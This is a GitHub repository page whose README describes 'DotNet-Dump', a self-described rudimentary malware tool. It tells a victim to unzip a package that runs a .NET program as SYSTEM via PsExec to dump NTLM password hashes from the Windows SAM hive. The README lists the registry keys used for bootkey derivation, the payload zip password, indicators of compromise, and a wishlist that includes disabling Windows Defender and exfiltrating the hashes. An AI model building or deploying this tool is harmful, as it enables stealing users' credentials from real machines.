Skip to content

pjsacchet/DotNet-Dump

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

13 Commits
DotNet-Dump
DotNet-Dump
 
 
.gitignore
.gitignore
 
 
CalcHash.py
CalcHash.py
 
 
LICENSE
LICENSE
 
 
Payload.zip
Payload.zip
 
 
README.md
README.md
 
 
execute.bat
execute.bat
 
 

Repository files navigation

DotNet-Dump

Description

Dump password hashes and other useful info via .NET

Design

This piece of rudimentary malware will be packaged with PsExec (from sysinternals) along with a batch script that will run the program. The CONOP is as follows:

  • User downloads packaged/zipped files onto target computer
  • Upon unzipping, our batch file will execute:
    • Our dotnet binary as SYSTEM via PsExec and
    • Our python file to parse the contents generated by our dumper and generating user hashes

Execution

Upon execution, this program will:

  • Start parsing the registry, specifically the SAM hive for user related passowrd hashes
  • Program will dump password information to files; batch script will then feed this information into follow on script
  • Dump passwords to final output file; cleanup and exit

Password Hashes

Plain password hashes (NTLM) on Windows are stored and retrieved via the following steps:

  • Obtian the bootkey (requires SYSTEM level privileges)
    • This is really just a concatenation of the class information for four registry keys:
      • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet%03d\Control\Lsa where %03d is the current control set (HKEY_LOCAL_MACHINE\SYSTEM\Select\Current)
        • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet%03d\Control\Lsa\JD
        • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet%03d\Control\Lsa\Skew1
        • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet%03d\Control\Lsa\GBG
        • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet%03d\Control\Lsa\Data
      • We also need HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\F for calculationing hashes
  • Enumerate all user accounts stored in HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users (these are RIDs for each user)
    • Obtain the 'V' key for each user
    • Use bootkey to decrypt password hashes

Payload

The payload itself will be a zipped folder (password: infected!), including four things:

  • Our bat file which will run our dotnet program and python parsing file
  • PsExec to execute in a SYSTEM context
  • Our dotnet executable
  • Our python file (compiled as a executable)
    • You can build python files as executables via pyinstaller.exe --onefile -w <filename.py>

Indicators of Compromise (IOCs)

  • Files being written to system32 directory
  • PsExec running, dotnet executable running as SYSTEM
  • Sensitive registry keys being read/touched

References:

Wishlist

  • Survey target for signs of Windows Defender; attempt to disable it
  • Cleanup after files execute
  • Transport hashes file off target or send them directly

About

Dump password hashes and other useful info via .NET

Topics

registry dotnet malware password sam hash ntlm ntlm-authentication ntlm-hash-extraction password-dump ntlm-hashes impacket-secretsdump secretsdump

Resources

Readme

License

MIT license
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages